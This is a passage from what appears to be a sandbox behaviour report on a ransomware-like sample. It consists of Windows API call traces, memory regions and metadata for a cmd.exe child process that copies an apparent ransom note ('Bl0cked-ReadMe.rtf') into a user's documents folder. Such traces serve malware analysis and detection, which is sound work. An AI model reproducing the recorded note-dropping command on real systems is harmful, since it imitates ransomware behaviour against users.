lpOverlapped=0x0) returned 1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.879] GetFileType (hFile=0x4c) returned 0x1 [0234.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] GetFileType (hFile=0x4c) returned 0x1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.880] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x32, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] GetFileType (hFile=0x4c) returned 0x1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] GetFileType (hFile=0x4c) returned 0x1 [0234.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.880] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x32, lpOverlapped=0x0) returned 1 [0234.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.880] _close (_FileHandle=4) returned 0 [0234.880] FindNextFileW (in: hFindFile=0x380e70, lpFindFileData=0x26f144 | out: lpFindFileData=0x26f144) returned 0 [0234.881] GetLastError () returned 0x12 [0234.881] FindClose (in: hFindFile=0x380e70 | out: hFindFile=0x380e70) returned 1 [0234.881] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.360] _close (_FileHandle=3) returned 0 [0235.361] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.361] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.361] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.361] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.361] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.361] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.361] SetConsoleInputExeNameW () returned 0x1 [0235.361] GetConsoleOutputCP () returned 0x1b5 [0235.361] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.361] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.361] exit (_Code=0) Process: id = "633" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0xdec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35038 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35039 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35040 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35041 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 35042 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35043 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35044 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35045 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35046 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 35047 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35498 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35499 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35500 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35501 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 35502 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 35503 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35504 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35507 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35508 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35509 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35510 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35511 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35512 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 35513 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35514 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35515 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35516 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35517 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35518 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35519 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 35520 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 35521 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 873 os_tid = 0xde4 [0235.204] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb94 | out: lpSystemTimeAsFileTime=0x22fb94*(dwLowDateTime=0xbfa75420, dwHighDateTime=0x1d440a9)) [0235.204] GetCurrentProcessId () returned 0xdec [0235.204] GetCurrentThreadId () returned 0xde4 [0235.204] GetTickCount () returned 0x40943 [0235.204] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb8c | out: lpPerformanceCount=0x22fb8c*=29199325969) returned 1 [0235.205] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.205] __set_app_type (_Type=0x1) [0235.205] __p__fmode () returned 0x76b331f4 [0235.205] __p__commode () returned 0x76b331fc [0235.205] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.205] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.205] GetCurrentThreadId () returned 0xde4 [0235.205] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde4) returned 0x38 [0235.205] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.205] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.205] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.205] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fb24 | out: phkResult=0x22fb24*=0x0) returned 0x2 [0235.205] VirtualQuery (in: lpAddress=0x22fb5b, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.205] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.206] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.206] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.206] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.206] GetConsoleOutputCP () returned 0x1b5 [0235.206] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.206] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.206] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.206] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.207] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.207] GetEnvironmentStringsW () returned 0x420198* [0235.207] FreeEnvironmentStringsW (penv=0x420198) returned 1 [0235.207] GetEnvironmentStringsW () returned 0x420198* [0235.207] FreeEnvironmentStringsW (penv=0x420198) returned 1 [0235.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea94 | out: phkResult=0x22ea94*=0x40) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0xc0, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x0, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegCloseKey (hKey=0x40) returned 0x0 [0235.207] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea94 | out: phkResult=0x22ea94*=0x40) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x0, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x9, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x9, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x9, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.208] RegCloseKey (hKey=0x40) returned 0x0 [0235.208] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.208] srand (_Seed=0x5b8863c2) [0235.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0235.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0235.208] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.208] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.208] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.208] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.208] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.208] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.208] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.208] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.208] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.209] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.209] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.209] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.209] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.209] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.209] GetEnvironmentStringsW () returned 0x4222e8* [0235.209] FreeEnvironmentStringsW (penv=0x4222e8) returned 1 [0235.209] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.209] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.209] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.209] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.209] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.209] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.209] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.209] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.209] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.209] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.209] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f860 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.209] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f860, lpFilePart=0x22f85c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f85c*="Desktop") returned 0x18 [0235.209] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.209] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f5dc | out: lpFindFileData=0x22f5dc) returned 0x420028 [0235.209] FindClose (in: hFindFile=0x420028 | out: hFindFile=0x420028) returned 1 [0235.210] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f5dc | out: lpFindFileData=0x22f5dc) returned 0x420028 [0235.210] FindClose (in: hFindFile=0x420028 | out: hFindFile=0x420028) returned 1 [0235.210] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f5dc | out: lpFindFileData=0x22f5dc) returned 0x420028 [0235.210] FindClose (in: hFindFile=0x420028 | out: hFindFile=0x420028) returned 1 [0235.210] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.210] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.210] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.210] GetEnvironmentStringsW () returned 0x422b08* [0235.210] FreeEnvironmentStringsW (penv=0x422b08) returned 1 [0235.210] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.211] GetConsoleOutputCP () returned 0x1b5 [0235.211] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.211] GetUserDefaultLCID () returned 0x409 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f9a0, cchData=128 | out: lpLCData="0") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f9a0, cchData=128 | out: lpLCData="0") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f9a0, cchData=128 | out: lpLCData="1") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.212] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.212] GetConsoleTitleW (in: lpConsoleTitle=0x4108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.213] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.213] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.213] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.213] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.213] _wcsicmp (_String1="type", _String2=")") returned 75 [0235.213] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0235.213] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0235.213] _wcsicmp (_String1="IF", _String2="type") returned -11 [0235.213] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0235.214] _wcsicmp (_String1="REM", _String2="type") returned -2 [0235.214] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0235.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.217] GetFileType (hFile=0x7) returned 0x2 [0235.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f898 | out: 